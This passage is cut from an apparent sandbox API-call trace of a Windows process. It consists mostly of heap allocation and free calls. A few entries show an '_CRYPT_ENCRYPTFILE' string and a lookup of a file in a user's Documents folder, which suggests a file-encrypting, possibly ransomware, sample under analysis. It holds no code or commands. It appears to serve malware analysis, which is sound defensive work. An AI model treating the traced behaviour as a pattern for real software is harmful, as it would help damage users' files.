HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4ae0 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.714] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.714] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.714] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.716] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0079.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0079.717] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0079.717] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.717] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca670, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.718] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.718] CloseHandle (hObject=0x298) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.718] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.719] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.720] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36c3c2c0, ftCreationTime.dwHighDateTime=0x1d5e967, ftLastAccessTime.dwLowDateTime=0xefd1a510, ftLastAccessTime.dwHighDateTime=0x1d5efe9, ftLastWriteTime.dwLowDateTime=0xefd1a510, ftLastWriteTime.dwHighDateTime=0x1d5efe9, nFileSizeHigh=0x0, nFileSizeLow=0x12013, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="sAJ5q4Jpz7.csv", cAlternateFileName="SAJ5Q4~1.CSV")) returned 0x41ac600 [0079.721] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 